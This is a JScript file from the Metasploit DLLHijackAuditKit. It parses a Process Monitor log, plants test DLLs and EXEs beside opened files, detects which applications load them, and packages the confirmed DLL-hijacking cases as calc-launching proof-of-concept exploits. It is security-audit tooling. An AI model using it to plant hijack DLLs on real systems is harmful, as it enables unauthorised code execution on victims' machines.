metasploit-framework/external/source/DLLHijackAuditKit/analyze.js

203 lines
5.8 KiB
JavaScript
Raw Normal View History

/* DLLHijackAuditKit (C) 2010 Rapid7 LLC */
var oFso = new ActiveXObject("Scripting.FileSystemObject");
var oShl = new ActiveXObject("WScript.Shell");
var oCWD = oShl.CurrentDirectory + "";
function print_status(msg) {
try {
WScript.StdOut.WriteLine("[*] "+ msg);
} catch(e) {}
}
function process_list() {
var res = new Array();
var wbemFlagReturnImmediately = 0x10;
var wbemFlagForwardOnly = 0x20;
var oWMI = GetObject("winmgmts:\\\\localhost\\root\\CIMV2");
var cPID = oWMI.ExecQuery("SELECT * FROM Win32_Process", "WQL", wbemFlagReturnImmediately | wbemFlagForwardOnly);
var enumItems = new Enumerator(cPID);
for (; !enumItems.atEnd(); enumItems.moveNext()) {
var p = enumItems.item();
if (p.ExecutablePath && p.ExecutablePath.toLowerCase().indexOf("taskmgr") != -1) continue;
res.push(p.ProcessId);
}
return res;
}
function replace_payloads(dir, src) {
var base = oFso.GetFolder(dir);
var files = new Enumerator(base.files);
for (; !files.atEnd(); files.moveNext()) {
var entry = files.item().Name.toString().toLowerCase();
if ( entry.indexOf("exploit.") == -1) {
if (entry.toString().indexOf(".exe") != -1) {
try { oFso.CopyFile(src + "\\runcalc.exe", dir + "\\" + entry); } catch(e) { }
} else {
try { oFso.CopyFile(src + "\\runcalc.dll", dir + "\\" + entry); } catch(e) { }
}
}
}
var subs = new Enumerator(base.SubFolders);
for (; !subs.atEnd(); subs.moveNext()) {
var entry = (subs.item() + "").toLowerCase();
replace_payloads(entry, src);
}
}
/* Process Logfile.CSV
a) Make a list of applications and their associated DLLs
b) Create a test case for each extension and each DLL
c) Run each test case and look for "exploited.txt"
d) Copy confirmed test cases to a new directory
*/
if (! oFso.FileExists("Logfile.CSV")) {
print_status("Please save Logfile.CSV to the current directory first");
WScript.Quit();
}
var procs = process_list();
print_status("Protecting " + procs.length + " processes");
var apps = new Array();
var fCSV = oFso.OpenTextFile("Logfile.CSV");
var line = fCSV.ReadLine();
var iPath = 4;
var iProc = 1;
var bits = line.split(",");
// Determine which fields are what index
for (var i=0; i < bits.length; i++) {
if (bits[i].toLowerCase().indexOf("process name") != -1) {
iProc = i;
}
if (bits[i].toLowerCase().indexOf("path") != -1) {
iPath = i;
}
}
// Parse the CSV into a map of each application's loads
while( ! fCSV.AtEndOfStream ) {
line = fCSV.ReadLine();
bits = line.replace(/\",/g, "\"||||").replace(/"/g, '').split("||||");
var vApp = bits[iProc].toLowerCase();
var vPath = bits[iPath].toLowerCase();
var vExt = vPath.replace(/.*DLLAudit\\ext\\/ig, '').split("\\")[0].toLowerCase();
var vTgt = vPath.replace(/.*DLLAudit\\ext\\/ig, '').split("\\");
vTgt.shift();
var vDll = vTgt.join("\\").toLowerCase();
if (! apps[vApp]) apps[vApp] = new Array();
if (! apps[vApp][vExt]) apps[vApp][vExt] = new Array();
apps[vApp][vExt][vDll] = true;
}
print_status("Generating and validating test cases...");
try { oFso.CreateFolder(oCWD + "\\TestCases"); } catch(e) { }
try { oFso.CreateFolder(oCWD + "\\Exploits"); } catch(e) { }
for (var tApp in apps) {
print_status(" Application: " + tApp);
var aBase = oCWD + "\\TestCases\\" + tApp;
try { oFso.CreateFolder(aBase); } catch(e) { }
for (var tExt in apps[tApp]) {
var eBase = aBase + "\\" + tExt;
var aExploited = new Array();
try { oFso.CreateFolder(eBase); } catch(e) { }
for (var tDll in apps[tApp][tExt]) {
var tBits = tDll.split("\\");
var tName = tBits.pop();
var dBase = eBase + "\\" + tName;
try { oFso.CreateFolder(dBase); } catch(e) { }
if (aExploited[tName]) continue;
// tDll may be a subdirectory + DLL
tPath = dBase;
for (var y = 0; y < tBits.length; y++) {
tPath = tPath + "\\" + tBits[y];
try { oFso.CreateFolder(tPath); } catch(e) { }
}
tPath = tPath + "\\" + tName;
try {
if (tName.toLowerCase().indexOf(".exe") != -1) {
oFso.CopyFile(oCWD + "\\runtest.exe", tPath);
} else {
oFso.CopyFile(oCWD + "\\runtest.dll", tPath);
}
} catch(e) { }
// Create the actual test case file
try {
var a = oFso.CreateTextFile(dBase + "\\exploit." + tExt);
a.WriteLine("HOWDY!");
a.Close();
} catch(e) { }
try {
// Run the test case
oShl.CurrentDirectory = dBase;
oShl.Run("cmd.exe /c start exploit." + tExt, 0);
} catch(e) { }
WScript.Sleep(500);
var nprocs = process_list();
var cnt = 0;
while(nprocs.length == procs.length && cnt < 2) {
cnt++;
WScript.Sleep(500);
nprocs = process_list();
}
// If an application spawned, give it three seconds
// This helps with ProcMon memory usage as well
if (nprocs.length > procs.length) {
WScript.Sleep(3000);
}
var killer = "taskkill /F ";
for (var i=0; i < nprocs.length; i++) {
var found = false;
for (var x=0; x < procs.length; x++) {
if (nprocs[i] == procs[x]) {
found = true;
break;
}
}
if (found) continue;
killer = killer + "/PID " + nprocs[i] + " ";
}
oShl.Run(killer, 0, true);
// Check for the file existence
if (oFso.FileExists(dBase + "\\exploited.txt")) {
print_status("Successfully exploited " + tApp + " with ." + tExt + " using " + tName);
aExploited[tName] = true;
var xBase = oCWD + "\\Exploits\\" + tApp + "_" + tExt + "_" + tName;
try { oFso.CreateFolder(xBase); } catch(e) { }
try { oFso.CopyFolder(dBase + "\\*.*", xBase + "\\", true); } catch(e) { }
try { oFso.CopyFile(dBase + "\\*.*", xBase + "\\", true); } catch(e) { }
try { oFso.DeleteFile(xBase + "\\exploited.txt"); } catch(e) { }
replace_payloads(xBase, oCWD);
}
}
}
}